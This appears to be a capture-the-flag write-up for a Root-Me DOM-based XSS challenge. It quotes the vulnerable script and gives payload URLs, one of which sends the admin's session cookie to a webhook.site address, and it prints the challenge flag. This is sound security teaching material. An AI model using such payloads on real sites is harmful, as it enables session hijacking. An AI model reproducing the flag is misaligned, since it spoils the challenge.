Challenge Info
🧨Challenge_name ==> XSS DOM Based - Introduction🧠Challenge Diff ==> Medium💯Challenge Score ==> 35📝Challenge Disc ==> Steal the admin’s session cookie.📚Challenge Category ==> Web - Client👾Challenge flag format ==> rootme{...sOmeTHings...}At first, I visited the challenge URL and saw this page:
Ok i see two path, First path is Contact, for Contact with admin (Using this form for hijacking admin cookie)
and next path is main page with an input
Ok next step i enter random number like 10 in input and now i see this script in source.
<script> var random = Math.random() * (99); var number = '10'; if(random == number) { document.getElementById('state').style.color = 'green'; document.getElementById('state').innerHTML = 'You won this game but you don\'t have the flag ;)'; } else{ document.getElementById('state').style.color = 'red'; document.getElementById('state').innerText = 'Sorry, wrong answer ! The right answer was ' + random; }</script>Easy! now i need to send this exploit:
http://challenge01.root-me.org/web-client/ch32/?number=10%27;alert(origin);//
Niiiicee!!🎉 Now i found xss vulnerability Ok, next step is to hijacking admin’s cookie. but how? Answer is contact form. For hijacking cookie i use Webhook.
Webhook.site— a simple service to capture and inspect HTTP requests in real time.
when admin click on this exploit:
http://challenge01.root-me.org/web-client/ch32/?number=10%27;document.location = `https://webhook.site/WEBHOOK_ID?cookie=${document.cookie}`;//
After a few seconds, i give it😈:
Flag
rootme{XSS_D0M_BaSed_InTr0}